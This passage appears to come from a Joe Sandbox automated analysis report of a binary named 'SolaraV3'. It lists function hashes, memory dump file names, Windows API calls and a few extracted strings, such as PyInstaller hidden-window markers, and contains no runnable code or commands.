                                                                                                                                                                                                                              • Opcode ID: 1a2b65ba27d9b07fa30d0be5417cb7ed185184055f80ad47060b652c762a0a3e
                                                                                                                                                                                                                              • Instruction ID: 43ac1281434680340e6cfb263e4c3bcf2b72f214817af0faecd78219c4513109
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1a2b65ba27d9b07fa30d0be5417cb7ed185184055f80ad47060b652c762a0a3e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4621F721B1865A46FA109B2368143FE9661BF45BD4F8C5432EE4C8B786CE7EE063C700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
                                                                                                                                                                                                                              • Instruction ID: f8422d1c04b205098efb05b2fecd43552efd24ecbfcf616639df63dd37548e03
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D31A462A1861A85F7116F6D886137C2A94BF80BA0F522237E95D933D2CF7CE4678711
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                              • Instruction ID: 80008af62441f8f444589d6e03f262c18b15e8bfb9f3c72daf03557e33d7fd16
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 33118731E1C64981FAA59F19942017DA368BF85B94F546433FB4CD7B96CF3DD4228700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                              • Instruction ID: f3a74f9fbda2858e96c7fdfd1565a5dba3ee2ddc81fea37d2288d50cdd7beae5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9921A432A18A4587EB719F58D45037DB7A0FB84B54F24423AEA9DC76DADF3CD4228B00
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                              • Instruction ID: 6366436472c9eb8353529533f2eb0bfa139cdc9fdd466ed8a60788a2df9f1f45
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B801C821A0874940E604DF5B995006DA695BF86FE0F5C5632DE6C97BD6CE3CE4238300
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DC709390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6DC7045F4,00000000,00007FF6DC701985), ref: 00007FF6DC7093C9
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00007FF6DC706476,?,00007FF6DC70336E), ref: 00007FF6DC708EA2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2592636585-0
                                                                                                                                                                                                                              • Opcode ID: 11a4aaaef8a7a10f6e0ce37232ac144c9e9b59754371ad75d1a790c2d21c933d
                                                                                                                                                                                                                              • Instruction ID: 64f6a83e57a3506b6fda1eae154b1f2b4289dcef3a941081d562d48aa679d09c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 11a4aaaef8a7a10f6e0ce37232ac144c9e9b59754371ad75d1a790c2d21c933d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EED0C201F3428942EA58A76BBA5663D9251AF89BC0F8CD036EE0D43B4ADC3CC0624B00
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2050155704.00007FFB0C351000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFB0C350000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050110758.00007FFB0C350000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3C4000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3E9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3F4000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3FE000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050476741.00007FFB0C401000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050521039.00007FFB0C403000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffb0c350000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1452528299-0
                                                                                                                                                                                                                              • Opcode ID: 5563a82993f3f8e44ea2e202436c36dc659c7fe328bd3c98202d5b79c02492c4
                                                                                                                                                                                                                              • Instruction ID: 47cf011dde15dc39fcdf87ab0e41da9159be3bec662161a287ae012b55f24998
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5563a82993f3f8e44ea2e202436c36dc659c7fe328bd3c98202d5b79c02492c4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5431B0F2A2A24286E7A49F35D54AE7D73B1EF40B84F148431EE0947795CF3CE8828740
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2050155704.00007FFB0C351000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFB0C350000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050110758.00007FFB0C350000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3C4000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3E9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3F4000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3FE000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050476741.00007FFB0C401000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050521039.00007FFB0C403000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffb0c350000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1452528299-0
                                                                                                                                                                                                                              • Opcode ID: f8a161ca16946112414120da3da362b423baedddf845a4f9c426056871324c08
                                                                                                                                                                                                                              • Instruction ID: 2dc10d5821b7132051792e0c47bfbbf55dbfc9b0f42b08278e9affeceb42ba6e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f8a161ca16946112414120da3da362b423baedddf845a4f9c426056871324c08
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A821ACB2B187808BD754DB26E584AADB3A0FB89B94F448135EF8C47B64CF78D455CB00
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2050155704.00007FFB0C351000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFB0C350000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050110758.00007FFB0C350000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3C4000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3E9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3F4000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050155704.00007FFB0C3FE000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050476741.00007FFB0C401000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2050521039.00007FFB0C403000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffb0c350000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1452528299-0
                                                                                                                                                                                                                              • Opcode ID: d30e7c5704879f11d1e112ae6777e6cf3c1901bb9f2e947874565881c85a4ca2
                                                                                                                                                                                                                              • Instruction ID: ea3a847ba3fdc5aafba4a9ae2bf5e12607c184f041d7267fa36297db3492f14a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d30e7c5704879f11d1e112ae6777e6cf3c1901bb9f2e947874565881c85a4ca2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4EF06DA6A1878186D6009B26F404AAAA360EB88FC0F188031EE8D47BA9DF38C4818700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(?,?,?,00007FF6DC710C90,?,?,?,00007FF6DC7122FA,?,?,?,?,?,00007FF6DC713AE9), ref: 00007FF6DC71D63A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4292702814-0
                                                                                                                                                                                                                              • Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                              • Instruction ID: 99ec219f8cf046e9289f3b5593592994e25866adea525afe5e7e9f8b82c70968
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D4F08210F0C20F45FE661775582527C12944FD47E0F082732DC2EC62C2DE3CA4A38910
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                              • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                              • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                              • Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                              • Instruction ID: 1bff4179a1be7ff1bc58e4b5cef247cd99b3322a71b3d108e5b5ec61d38f45b0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94D18731A08B8A86EB209F75E8642AD7770FF84758F500237DA5E83A95DF3CD566D700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: EnvironmentVariable$ByteCharMultiWide
                                                                                                                                                                                                                              • String ID: .rnd$HOME$RANDFILE$SYSTEMROOT$USERPROFILE
                                                                                                                                                                                                                              • API String ID: 2184640988-1666712896
                                                                                                                                                                                                                              • Opcode ID: 6ae7bf8170fe4eb4311700b15542d8ceb35a2668fc38af68052a7f4661d56c96
                                                                                                                                                                                                                              • Instruction ID: 2e0ddf5dcf605b0d2827ddc5107c71d794f4fcb8a9c1189d3736fcbc79c83a62
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6ae7bf8170fe4eb4311700b15542d8ceb35a2668fc38af68052a7f4661d56c96
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3261B6A6608B8296EB148F36D450A7967A1FF55BA8B48C231DE6F837F4DF3DE0058300
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,00007FF6DC708919,00007FF6DC703F9D), ref: 00007FF6DC70842B
                                                                                                                                                                                                                              • RemoveDirectoryW.KERNEL32(?,00007FF6DC708919,00007FF6DC703F9D), ref: 00007FF6DC7084AE
                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,00007FF6DC708919,00007FF6DC703F9D), ref: 00007FF6DC7084CD
                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(?,00007FF6DC708919,00007FF6DC703F9D), ref: 00007FF6DC7084DB
                                                                                                                                                                                                                              • FindClose.KERNEL32(?,00007FF6DC708919,00007FF6DC703F9D), ref: 00007FF6DC7084EC
                                                                                                                                                                                                                              • RemoveDirectoryW.KERNEL32(?,00007FF6DC708919,00007FF6DC703F9D), ref: 00007FF6DC7084F5
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                              • String ID: %s\*
                                                                                                                                                                                                                              • API String ID: 1057558799-766152087
                                                                                                                                                                                                                              • Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                              • Instruction ID: 398dc6730260bb16ff4ede751416c0e23ca2e6ce85e6efacb00cf5f107a4fce0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B2417F21A0CA4A85EA709F61A4541FE6370FB94794F400333E6AEC26C4EF3DE567D701
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
